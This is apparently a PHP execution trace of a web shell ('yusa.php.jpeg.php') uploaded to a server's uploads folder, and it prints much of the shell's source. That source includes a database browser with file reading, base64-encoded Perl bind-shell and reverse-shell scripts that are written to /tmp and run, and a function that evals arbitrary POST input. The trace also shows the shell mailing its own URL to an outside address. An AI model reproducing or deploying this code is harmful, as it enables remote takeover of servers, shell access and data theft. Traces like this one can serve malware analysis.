";\r\n\t$tmp = "";\r\n\tif(isset($_POST[\'sql_host\'])){\r\n\t\tif($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n\t\t\tswitch($_POST[\'charset\']) {\r\n\t\t\t\tcase "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n\t\t\t\tcase "UTF-8": $db->setCharset(\'utf8\'); break;\r\n\t\t\t\tcase "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n\t\t\t\tcase "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n\t\t\t\tcase "cp866": $db->setCharset(\'cp866\'); break;\r\n\t\t\t}\r\n\t\t\t$db->listDbs();\r\n\t\t\techo "\';\r\n\t\t}\r\n\t\telse echo $tmp;\r\n\t}else\r\n\t\techo $tmp;\r\n\techo ">\' onclick=\'fs(d.sf);\'> count the number of rows
\r\n\t\t";\r\n\tif(isset($db) && $db->link){\r\n\t\techo "
";\r\n\t\t\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t\t\techo "";\r\n\t\t\t}\r\n\t\t\techo "
Tables:

";\r\n\t\t\t\t$tbls_res = $db->listTables();\r\n\t\t\t\twhile($item = $db->fetch($tbls_res)) {\r\n\t\t\t\t\tlist($key, $value) = each($item);\r\n if(!empty($_POST[\'sql_count\']))\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n\t\t\t\t\t$value = htmlspecialchars($value);\r\n\t\t\t\t\techo " ".$value."" . (empty($_POST[\'sql_count\'])?\' \':" ({$n[\'n\']})") . "
";\r\n\t\t\t\t}\r\n\t\t\t\techo "
File path:		";\r\n\t\t\t\tif(@$_POST[\'p1\'] == \'select\') {\r\n\t\t\t\t\t$_POST[\'p1\'] = \'query\';\r\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n\t\t\t\t\t$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n\t\t\t\t\t$num = $db->fetch();\r\n\t\t\t\t\t$pages = ceil($num[\'n\'] / 30);\r\n echo "".$_POST[\'p2\']." ({$num[\'n\']} records) Page # ";\r\n echo " of $pages";\r\n if($_POST[\'p3\'] > 1)\r\n echo " < Prev";\r\n if($_POST[\'p3\'] < $pages)\r\n echo " Next >";\r\n $_POST[\'p3\']--;\r\n\t\t\t\t\tif($_POST[\'type\']==\'pgsql\')\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n\t\t\t\t\techo "

";\r\n\t\t\t\t}\r\n\t\t\t\tif((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n\t\t\t\t\t$db->query(@$_POST[\'p2\']);\r\n\t\t\t\t\tif($db->res !== false) {\r\n\t\t\t\t\t\t$title = false;\r\n\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t$line = 1;\r\n\t\t\t\t\t\twhile($item = $db->fetch())\t{\r\n\t\t\t\t\t\t\tif(!$title)\t{\r\n\t\t\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t\t\tforeach($item as $key => $value)\r\n\t\t\t\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t\t\treset($item);\r\n\t\t\t\t\t\t\t\t$title=true;\r\n\t\t\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t\t\t$line = 2;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t\t$line = $line==1?2:1;\r\n\t\t\t\t\t\t\tforeach($item as $key => $value) {\r\n\t\t\t\t\t\t\t\tif($value == null)\r\n\t\t\t\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \'
\'.$key.\'
null\'.nl2br(htmlspecialchars($value)).\'
\';\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \'
Error: \'.htmlspecialchars($db->error()).\'
\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo "

";\r\n\t\t\t\techo "

";\r\n if($_POST[\'type\']==\'mysql\') {\r\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\r\n if($db->fetch())\r\n echo "
Load file >\'>
";\r\n }\r\n\t\t\tif(@$_POST[\'p1\'] == \'loadfile\') {\r\n\t\t\t\t$file = $db->loadFile($_POST[\'p2\']);\r\n\t\t\t\techo \'
\'.htmlspecialchars($file[\'file\']).\'
\';\r\n\t\t\t}\r\n\t} else {\r\n echo htmlspecialchars($db->error());\r\n }\r\n\techo \'
\';\r\n\tBOFFFooter();\r\n}\r\nfunction actionNetwork() {\r\n\tBOFFHeader();\r\n\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n\techo "

Network tools

\r\n\t
\r\n\tBind port to /bin/sh [perl]
\r\n\tPort: >\'>\r\n\t
\r\n\t
\r\n\tBack-connect [perl]
\r\n\tServer: Port: >\'>\r\n\t

";\r\n\tif(isset($_POST[\'p1\'])) {\r\n\t\tfunction cf($f,$t) {\r\n\t\t\t$w = @fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n\t\t\tif($w){\r\n\t\t\t\t@fwrite($w,@base64_decode($t));\r\n\t\t\t\t@fclose($w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpp\') {\r\n\t\t\tcf("/tmp/bp.pl",$bind_port_p);\r\n\t\t\t$out = BOFFEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &");\r\n\t\t\techo "
$out\\n".BOFFEx("ps aux | grep bp.pl")."
";\r\n unlink("/tmp/bp.pl");\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcp\') {\r\n\t\t\tcf("/tmp/bc.pl",$back_connect_p);\r\n\t\t\t$out = BOFFEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &");\r\n\t\t\techo "
$out\\n".BOFFEx("ps aux | grep bc.pl")."
";\r\n unlink("/tmp/bc.pl");\r\n\t\t}\r\n\t}\r\n\techo \'
\';\r\n\tBOFFFooter();\r\n}\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => phpversion(),\r\n\t\t\t"BOFF_version" => BOFF_VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\nif( empty($_POST[\'a\']) )\r\n\tif(isset($default_action) && function_exists(\'action\' . $default_action))\r\n\t\t$_POST[\'a\'] = $default_action;\r\n\telse\r\n\t\t$_POST[\'a\'] = \'SecInfo\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);\r\nexit;\r\n?>\r\n' /var/www/html/uploads/yusa.php.jpeg.php 48 0 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 3 $web = 'localhost' 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 4 $inj = '/uploads/yusa.php.jpeg.php' 3 7 0 0.006143 992568 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 5 1 NULL 3 7 1 0.006161 992760 3 7 R '' 3 8 0 0.006181 992632 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 6 1 NULL 3 8 1 0.006195 992824 3 8 R '' 3 9 0 0.006209 992648 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 7 1 '/uploads/yusa.php.jpeg.php' 3 9 1 0.006224 992840 3 9 R '/uploads/yusa.php.jpeg.php' 3 10 0 0.006240 992696 htmlspecialchars 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 7 1 'localhost' 3 10 1 0.006254 992888 3 10 R 'localhost' 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 7 $body = 'Egy_Spider \nUserName: \nPassWord:\r\n\nMessage:\n\nE-server: /uploads/yusa.php.jpeg.php\nE-server2: localhost\n\nIP: \r\n' 3 11 0 0.006288 992808 mail 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 9 3 'wp@live.fr' 'Shell http://localhost/uploads/yusa.php.jpeg.php' 'Egy_Spider \nUserName: \nPassWord:\r\n\nMessage:\n\nE-server: /uploads/yusa.php.jpeg.php\nE-server2: localhost\n\nIP: \r\n' 3 11 1 0.007384 992904 3 11 R FALSE 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 11 $auth_pass = '' 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 12 $color = '#df5' 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 13 $default_action = 'FilesMan' 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 14 $default_use_ajax = TRUE 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 15 $default_charset = 'Windows-1251' 2 A /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 18 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler'] 3 12 0 0.007496 992728 implode 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 19 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler'] 3 12 1 0.007519 992872 3 12 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler' 3 13 0 0.007537 992808 preg_match 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 19 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1' 3 13 1 0.007557 992872 3 13 R 0 3 14 0 0.007570 992728 session_start 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 25 0 3 14 1 0.007589 992728 3 14 R FALSE 3 15 0 0.007603 992728 ini_set 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 26 2 'error_log' NULL 3 15 1 0.007620 992800 3 15 R '' 3 16 0 0.007633 992728 ini_set 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 27 2 'log_errors' 0 3 16 1 0.007648 992800 3 16 R '1' 3 17 0 0.007661 992728 ini_set 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 28 2 'max_execution_time' 0 3 17 1 0.007678 992832 3 17 R '30' 3 18 0 0.007691 992728 set_time_limit 0 /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()'d code 29 1 0 3 18 1 0.007712 992792 3 18 R FALSE 2 6 1 0.007738 993848 1 3 1 0.007753 959128 1 19 0 0.007767 959160 Error->__toString 0 Unknown 0 0 2 20 0 0.007780 959240 Error->getTraceAsString 0 Unknown 0 0 2 20 1 0.007793 959496 2 20 R '#0 /var/www/html/uploads/yusa.php.jpeg.php(48): eval()\n#1 {main}' 1 19 1 0.007811 959792 1 19 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/yusa.php.jpeg.php(48) : eval()\'d code:30\nStack trace:\n#0 /var/www/html/uploads/yusa.php.jpeg.php(48): eval()\n#1 {main}' 0.007858 880440 TRACE END [2023-02-12 19:26:36.848740]